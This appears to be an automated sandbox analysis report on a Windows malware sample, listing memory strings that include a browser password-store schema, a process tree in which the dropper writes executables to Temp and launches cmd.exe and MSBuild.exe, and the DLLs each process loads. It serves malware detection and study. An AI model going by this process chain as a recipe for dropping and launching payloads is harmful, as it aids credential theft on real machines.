Source: u42w.0.exe, 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmp, u42w.0.exe, 00000001.00000002.2117238412.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u42w.0.exe, 00000001.00000002.2104366209.000000001D23A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: u42w.0.exe, 00000001.00000002.2117238412.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u42w.0.exe, 00000001.00000002.2104366209.000000001D23A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: u42w.0.exe, 00000001.00000003.1771521673.00000000231B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: u42w.0.exe, 00000001.00000002.2117238412.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u42w.0.exe, 00000001.00000002.2104366209.000000001D23A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: u42w.0.exe, 00000001.00000002.2117238412.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u42w.0.exe, 00000001.00000002.2104366209.000000001D23A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: g77dRQ1Csm.exe

Virustotal: Detection: 40%

Source: C:\Users\user\Desktop\g77dRQ1Csm.exe

File read: C:\Users\user\Desktop\g77dRQ1Csm.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\g77dRQ1Csm.exe "C:\Users\user\Desktop\g77dRQ1Csm.exe"
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Process created: C:\Users\user\AppData\Local\Temp\u42w.0.exe "C:\Users\user\AppData\Local\Temp\u42w.0.exe"
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Process created: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe "C:\Users\user\AppData\Local\Temp\u42w.2\run.exe"
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Process created: C:\Users\user\AppData\Local\Temp\u42w.3.exe "C:\Users\user\AppData\Local\Temp\u42w.3.exe"
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 1180
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe "C:\Users\user\AppData\Local\Temp\u42w.2\run.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe "C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe"
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 2332
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Process created: C:\Users\user\AppData\Local\Temp\u42w.0.exe "C:\Users\user\AppData\Local\Temp\u42w.0.exe"	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Process created: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe "C:\Users\user\AppData\Local\Temp\u42w.2\run.exe"	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Process created: C:\Users\user\AppData\Local\Temp\u42w.3.exe "C:\Users\user\AppData\Local\Temp\u42w.3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe "C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe"

Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: zipfldr.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: winshfhc.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: winshfhc.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: security.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: olepro32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: schedcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: idndl.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Section loaded: bitsproxy.dll	Jump to behavior
